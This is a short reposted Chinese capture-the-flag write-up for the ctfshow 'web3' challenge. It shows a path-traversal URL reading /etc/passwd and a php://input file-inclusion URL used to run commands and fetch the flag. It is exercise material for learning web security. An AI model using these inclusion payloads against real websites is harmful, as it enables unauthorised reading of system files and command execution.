ctfshow—web—web3


打開靶機

 

 

 提示是文件包含漏洞

 

 測試成功

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=../../../../../../../../../../etc/passwd

 

 此題考的是PHP偽協議+文件包含,實現任意命令執行

抓取數據包

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=php://input

 

 開始試驗,查詢當前目錄下的文件結構

 

 查看ctf_go_go_go文件內容

 

成功拿到flag


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM